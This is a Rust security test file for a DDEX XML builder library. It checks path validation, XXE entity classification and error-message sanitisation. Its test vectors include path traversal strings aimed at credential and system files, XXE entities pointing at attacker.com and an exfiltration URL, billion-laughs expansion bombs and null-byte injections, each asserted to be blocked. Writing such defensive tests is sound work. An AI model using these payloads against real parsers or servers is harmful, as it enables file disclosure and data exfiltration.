use ddex_builder::security::{
create_entity, create_external_entity, create_parameter_entity, EntityClassifier, ErrorContext,
ErrorMode, ErrorSanitizer, PathValidator, SanitizerConfig,
};
use std::io::{Error, ErrorKind};
use std::path::Path;
use std::time::Instant;
#[cfg(test)]
mod security_integration_tests {
use super::*;
#[test]
fn test_path_validation_comprehensive() {
println!("🛡️ Testing comprehensive path validation...");
let validator = PathValidator::new();
let dangerous_paths = vec![
"../../../etc/passwd",
"..\\..\\..\\Windows\\System32\\config\\SAM",
"./../../root/.ssh/id_rsa",
"dir/../../etc/shadow",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
"..%252f..%252f..%252fetc%252fpasswd",
"..%c0%af..%c0%af..%c0%afetc%c0%afpasswd",
"..\u{2044}..\u{2044}etc\u{2044}passwd",
"..\u{FF0F}..\u{FF0F}etc\u{FF0F}passwd",
"C:\\Windows\\System32\\drivers\\etc\\hosts",
"\\\\?\\C:\\Windows\\System32\\config\\SAM",
"\\\\localhost\\c$\\Windows\\System32\\config\\SAM",
"//./C:/Windows/System32/config/SAM",
"/proc/self/environ",
"/dev/mem",
"/etc/shadow",
"/root/.ssh/authorized_keys",
".env",
"config/database.yml",
"settings.json",
".aws/credentials",
];
for dangerous_path in dangerous_paths {
let result = validator.validate(dangerous_path);
assert!(
result.is_err(),
"Path '{}' should be blocked but was allowed",
dangerous_path
);
}
let safe_paths = vec![
"valid/file.xml",
"data/music/track.mp3",
"output/generated.xml",
"temp/processing.json",
];
for safe_path in safe_paths {
let result = validator.validate(safe_path);
assert!(
result.is_ok(),
"Safe path '{}' should be allowed",
safe_path
);
}
println!("✅ Path validation comprehensive test passed");
}
#[test]
fn test_entity_classification_xxe_defense() {
println!("🛡️ Testing entity classification XXE defense...");
let mut classifier = EntityClassifier::new();
let xxe_payloads = vec![
create_external_entity("xxe", "file:///etc/passwd"),
create_external_entity("xxe", "http://attacker.com/evil.dtd"),
create_external_entity("xxe", "ftp://evil.com/exfiltrate"),
create_external_entity("xxe", "jar:http://evil.com/evil.jar!/"),
create_parameter_entity("file", "file:///etc/passwd"),
create_parameter_entity("dtd", "http://attacker.com/evil.dtd"),
create_parameter_entity("exfil", "http://attacker.com/exfil?data=%file;"),
create_entity(
"lol",
"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;",
),
create_entity(
"lol2",
"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;",
),
create_entity(
"lol3",
"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;",
),
create_entity(
"lol4",
"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;",
),
create_entity("lol5", "LOL"),
create_entity("a", "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"), create_entity("b", "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;"), create_entity("c", "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;"), ];
for entity in xxe_payloads {
let entities = vec![entity];
let result = classifier.validate_entity_chain(&entities);
assert!(
!result.is_safe,
"XXE payload with entity '{}' should be blocked",
entities[0].name
);
assert!(
!result.errors.is_empty(),
"XXE payload with entity '{}' should have errors",
entities[0].name
);
}
let safe_entities = vec![
create_entity("title", "Song Title"),
create_entity("artist", "Artist Name"),
create_entity("isrc", "USRC17607839"),
create_entity("duration", "PT3M45S"),
];
let result = classifier.validate_entity_chain(&safe_entities);
assert!(result.is_safe, "Safe DDEX entities should be allowed");
assert!(
result.errors.is_empty(),
"Safe DDEX entities should have no errors"
);
println!("✅ Entity classification XXE defense test passed");
}
#[test]
fn test_error_sanitization_no_leakage() {
println!("🛡️ Testing error sanitization prevents information leakage...");
let config = SanitizerConfig {
mode: ErrorMode::Production,
generate_correlation_ids: true,
log_internal_details: false, max_message_length: 200,
include_error_codes: true,
};
let mut sanitizer = ErrorSanitizer::with_config(config);
let sensitive_errors = vec![
(
"File path leakage",
Error::new(ErrorKind::PermissionDenied, "Cannot access /home/admin/secrets.txt containing API keys"),
ErrorContext::FileRead,
vec!["/home/admin", "secrets.txt", "API keys"],
),
(
"Network information leakage",
Error::new(ErrorKind::ConnectionRefused, "Connection failed to 192.168.1.100:8080 (internal server)"),
ErrorContext::NetworkRequest,
vec!["192.168.1.100", "8080", "internal server"],
),
(
"Memory address leakage",
Error::new(ErrorKind::Other, "Segmentation fault at address 0x7fff5fbff000 in function parse_xml()"),
ErrorContext::XmlParsing,
vec!["0x7fff5fbff000", "parse_xml"],
),
(
"Database connection leakage",
Error::new(ErrorKind::ConnectionRefused, "Failed to connect to postgres://admin:FAKE_PASSWORD_123@db.internal.com:5432/prod"),
ErrorContext::DatabaseConnection,
vec!["admin", "FAKE_PASSWORD_123", "db.internal.com", "5432", "prod"],
),
(
"API key leakage",
Error::new(ErrorKind::PermissionDenied, "Authentication failed: api_key=FAKE_API_KEY_FOR_TESTING_ONLY"),
ErrorContext::Authentication,
vec!["FAKE_API_KEY_FOR_TESTING_ONLY"],
),
];
for (test_name, error, context, sensitive_strings) in sensitive_errors {
let sanitized = sanitizer.sanitize(error, context);
for sensitive_string in sensitive_strings {
assert!(
!sanitized.message.contains(sensitive_string),
"{}: Message should not contain '{}' but got: '{}'",
test_name,
sensitive_string,
sanitized.message
);
assert!(
!sanitized.to_string().contains(sensitive_string),
"{}: Full output should not contain '{}' but got: '{}'",
test_name,
sensitive_string,
sanitized.to_string()
);
}
assert!(
!sanitized.correlation_id.is_empty(),
"{}: Should have correlation ID",
test_name
);
assert!(
sanitized.code.is_some(),
"{}: Should have error code",
test_name
);
assert!(
!sanitized.message.is_empty(),
"{}: Should have non-empty message",
test_name
);
}
println!("✅ Error sanitization no leakage test passed");
}
#[test]
fn test_cross_platform_path_validation() {
println!("🛡️ Testing cross-platform path validation...");
let validator = PathValidator::new();
let long_path_string = "A".repeat(5000);
let platform_attacks = vec![
("Windows UNC", "\\\\evil.com\\share\\file.exe"),
("Windows device", "\\\\.\\pipe\\evil"),
("Windows alternate data stream", "file.txt:hidden.exe"),
("Windows reserved names", "CON.txt"),
(
"Windows drive traversal",
"C:\\..\\..\\Windows\\System32\\cmd.exe",
),
("Unix proc filesystem", "/proc/self/mem"),
("Unix dev filesystem", "/dev/random"),
("Unix home traversal", "~/../../../etc/passwd"),
("Unix hidden files", ".bashrc"),
("macOS resource fork", "file.txt/..namedfork/rsrc"),
("macOS system path", "/System/Library/CoreServices/boot.efi"),
("macOS app bundle", "evil.app/Contents/MacOS/evil"),
("Null byte injection", "safe.txt\0../../etc/passwd"),
("Long path attack", &long_path_string),
("Control character", "file\x01name.txt"),
("Unicode homograph", "file\u{2044}name.txt"), ];
for (attack_name, attack_path) in platform_attacks {
let result = validator.validate(attack_path);
assert!(
result.is_err(),
"Platform attack '{}' with path '{}' should be blocked",
attack_name,
attack_path
);
}
println!("✅ Cross-platform path validation test passed");
}
#[test]
fn test_performance_impact_benchmark() {
println!("⚡ Testing performance impact of security improvements...");
const ITERATIONS: usize = 10000;
let path_validation_overhead = benchmark_path_validation(ITERATIONS);
assert!(
path_validation_overhead < 0.05, "Path validation overhead too high: {:.2}%",
path_validation_overhead * 100.0
);
let entity_classification_overhead = benchmark_entity_classification(ITERATIONS);
assert!(
entity_classification_overhead < 0.05, "Entity classification overhead too high: {:.2}%",
entity_classification_overhead * 100.0
);
let error_sanitization_overhead = benchmark_error_sanitization(ITERATIONS);
assert!(
error_sanitization_overhead < 0.05, "Error sanitization overhead too high: {:.2}%",
error_sanitization_overhead * 100.0
);
println!("✅ Performance impact test passed:");
println!(
" Path validation overhead: {:.2}%",
path_validation_overhead * 100.0
);
println!(
" Entity classification overhead: {:.2}%",
entity_classification_overhead * 100.0
);
println!(
" Error sanitization overhead: {:.2}%",
error_sanitization_overhead * 100.0
);
}
#[test]
fn test_integrated_security_workflow() {
println!("🔒 Testing integrated security workflow...");
let path_validator = PathValidator::new();
let mut entity_classifier = EntityClassifier::new();
let mut error_sanitizer = ErrorSanitizer::with_config(SanitizerConfig {
mode: ErrorMode::Production,
..SanitizerConfig::default()
});
let malicious_path = "../../../etc/passwd";
let path_result = path_validator.validate(malicious_path);
assert!(path_result.is_err(), "Malicious path should be blocked");
let path_error = Error::new(
ErrorKind::PermissionDenied,
format!(
"Path validation failed for {}: {:?}",
malicious_path,
path_result.err()
),
);
let sanitized_path_error = error_sanitizer.sanitize_security_error(path_error);
assert!(
!sanitized_path_error.to_string().contains("etc/passwd"),
"Sanitized path error should not contain sensitive path"
);
let malicious_entities = vec![
create_external_entity("xxe", "file:///etc/passwd"),
create_entity("bomb", "&bomb;&bomb;&bomb;&bomb;"),
];
let entity_result = entity_classifier.validate_entity_chain(&malicious_entities);
assert!(
!entity_result.is_safe,
"Malicious entities should be blocked"
);
let entity_error = Error::new(
ErrorKind::InvalidData,
format!(
"Entity validation failed: {}",
entity_result.errors.join(", ")
),
);
let sanitized_entity_error = error_sanitizer.sanitize_security_error(entity_error);
assert!(
!sanitized_entity_error
.to_string()
.contains("file:///etc/passwd"),
"Sanitized entity error should not contain sensitive entity reference"
);
assert!(
!sanitized_path_error.correlation_id.is_empty(),
"Path error should have correlation ID"
);
assert!(
!sanitized_entity_error.correlation_id.is_empty(),
"Entity error should have correlation ID"
);
println!("✅ Integrated security workflow test passed");
}
#[test]
fn test_security_edge_cases() {
println!("🔍 Testing security edge cases...");
let validator = PathValidator::new();
let empty_path = validator.validate("");
assert!(empty_path.is_err(), "Empty path should be blocked");
let long_path = "A".repeat(10000);
let long_path_result = validator.validate(&long_path);
assert!(
long_path_result.is_err(),
"Very long path should be blocked"
);
let null_byte_path = "safe.txt\0../../etc/passwd";
let null_result = validator.validate(null_byte_path);
assert!(null_result.is_err(), "Null byte attack should be blocked");
let unicode_attack = "..\u{2044}..\u{2044}etc\u{2044}passwd";
let unicode_result = validator.validate(unicode_attack);
assert!(
unicode_result.is_err(),
"Unicode normalization attack should be blocked"
);
let mut classifier = EntityClassifier::new();
let mut deep_entities = Vec::new();
for i in 0..100 {
if i == 99 {
deep_entities.push(create_entity(&format!("level{}", i), "deep"));
} else {
deep_entities.push(create_entity(
&format!("level{}", i),
&format!("&level{};", i + 1),
));
}
}
let deep_result = classifier.validate_entity_chain(&deep_entities);
assert!(
!deep_result.is_safe,
"Deeply nested entities should be blocked"
);
println!("✅ Security edge cases test passed");
}
fn benchmark_path_validation(iterations: usize) -> f64 {
let paths = vec![
"valid/path.xml",
"another/valid/path.json",
"../invalid/path.txt",
"normal/file.mp3",
];
let baseline_start = Instant::now();
for _ in 0..iterations {
for path in &paths {
let _ = Path::new(path).exists(); }
}
let baseline_time = baseline_start.elapsed();
let validator = PathValidator::new();
let security_start = Instant::now();
for _ in 0..iterations {
for path in &paths {
let _ = validator.validate(path);
}
}
let security_time = security_start.elapsed();
let overhead = (security_time.as_nanos() as f64 - baseline_time.as_nanos() as f64)
/ baseline_time.as_nanos() as f64;
overhead.max(0.0) }
fn benchmark_entity_classification(iterations: usize) -> f64 {
let entities = vec![
create_entity("title", "Song Title"),
create_entity("artist", "Artist Name"),
create_entity("isrc", "USRC17607839"),
];
let baseline_start = Instant::now();
for _ in 0..iterations {
for entity in &entities {
let _ = entity.name.len() + entity.value.len(); }
}
let baseline_time = baseline_start.elapsed();
let mut classifier = EntityClassifier::new();
let security_start = Instant::now();
for _ in 0..iterations {
let _ = classifier.validate_entity_chain(&entities);
}
let security_time = security_start.elapsed();
let overhead = (security_time.as_nanos() as f64 - baseline_time.as_nanos() as f64)
/ baseline_time.as_nanos() as f64;
overhead.max(0.0)
}
fn benchmark_error_sanitization(iterations: usize) -> f64 {
let test_errors = vec![
Error::new(ErrorKind::NotFound, "File not found"),
Error::new(ErrorKind::PermissionDenied, "Permission denied"),
Error::new(ErrorKind::InvalidData, "Invalid data"),
];
let baseline_start = Instant::now();
for _ in 0..iterations {
for error in &test_errors {
let _ = format!("Error: {}", error); }
}
let baseline_time = baseline_start.elapsed();
let mut sanitizer = ErrorSanitizer::new();
let security_start = Instant::now();
for _ in 0..iterations {
for error in &test_errors {
let cloned_error = Error::new(error.kind(), error.to_string());
let _ = sanitizer.sanitize_io_error(cloned_error, ErrorContext::FileRead);
}
}
let security_time = security_start.elapsed();
let overhead = (security_time.as_nanos() as f64 - baseline_time.as_nanos() as f64)
/ baseline_time.as_nanos() as f64;
overhead.max(0.0)
}
}
#[test]
fn test_security_memory_safety() {
println!("🧠 Testing memory safety and resource cleanup...");
let mut sanitizer = ErrorSanitizer::new();
let mut classifier = EntityClassifier::new();
for i in 0..1000 {
let error = Error::new(ErrorKind::Other, format!("Test error {}", i));
let _ = sanitizer.sanitize_io_error(error, ErrorContext::FileRead);
let entity = create_entity(&format!("test{}", i), &format!("value{}", i));
let _ = classifier.validate_entity_chain(&vec![entity]);
if i % 100 == 0 {
sanitizer.clear_error_store();
}
}
println!("✅ Memory safety test passed");
}
#[cfg(feature = "async")]
#[tokio::test]
async fn test_security_concurrent_access() {
use tokio::task;
println!("🔄 Testing concurrent access to security components...");
let handles: Vec<_> = (0..10)
.map(|i| {
task::spawn(async move {
let validator = PathValidator::new();
let mut classifier = EntityClassifier::new();
let mut sanitizer = ErrorSanitizer::new();
let path_result = validator.validate(&format!("test/path/{}.xml", i));
assert!(path_result.is_ok(), "Valid path should pass validation");
let entity = create_entity(&format!("test{}", i), &format!("value{}", i));
let entity_result = classifier.validate_entity_chain(&vec![entity]);
assert!(
entity_result.is_safe,
"Valid entity should pass classification"
);
let error = Error::new(ErrorKind::Other, format!("Test error {}", i));
let sanitized = sanitizer.sanitize_io_error(error, ErrorContext::FileRead);
assert!(
!sanitized.correlation_id.is_empty(),
"Should have correlation ID"
);
i
})
})
.collect();
for handle in handles {
handle.await.expect("Task should complete successfully");
}
println!("✅ Concurrent access test passed");
}
#[test]
fn test_security_malformed_input_handling() {
println!("💥 Testing malformed input handling...");
let validator = PathValidator::new();
let mut classifier = EntityClassifier::new();
let mut sanitizer = ErrorSanitizer::new();
let bom_string = "\u{FEFF}".repeat(100);
let malformed_paths = vec![
"\0\0\0\0", "\x01\x02\x03\x04", "🔥💀☠️", &bom_string, ];
for path in malformed_paths {
let result = validator.validate(path);
assert!(result.is_err(), "Malformed path should be rejected");
}
let malformed_entities = vec![
create_entity("", ""), create_entity("\0", "value"), create_entity("name", "\0"), create_entity(&"A".repeat(10000), "value"), create_entity("name", &"A".repeat(100000)), ];
for entity in malformed_entities {
let result = classifier.validate_entity_chain(&vec![entity]);
assert!(
!result.errors.is_empty() || result.is_safe,
"Should either have errors or be safe, not crash"
);
}
let long_message_string = "A".repeat(100000);
let malformed_error_messages = vec![
"", "\0\0\0", "\x01\x02\x03", &long_message_string, ];
for msg in malformed_error_messages {
let error = Error::new(ErrorKind::Other, msg);
let sanitized = sanitizer.sanitize_io_error(error, ErrorContext::FileRead);
assert!(
!sanitized.correlation_id.is_empty(),
"Should have correlation ID"
);
assert!(
!sanitized.message.is_empty(),
"Should have non-empty message"
);
}
println!("✅ Malformed input handling test passed");
}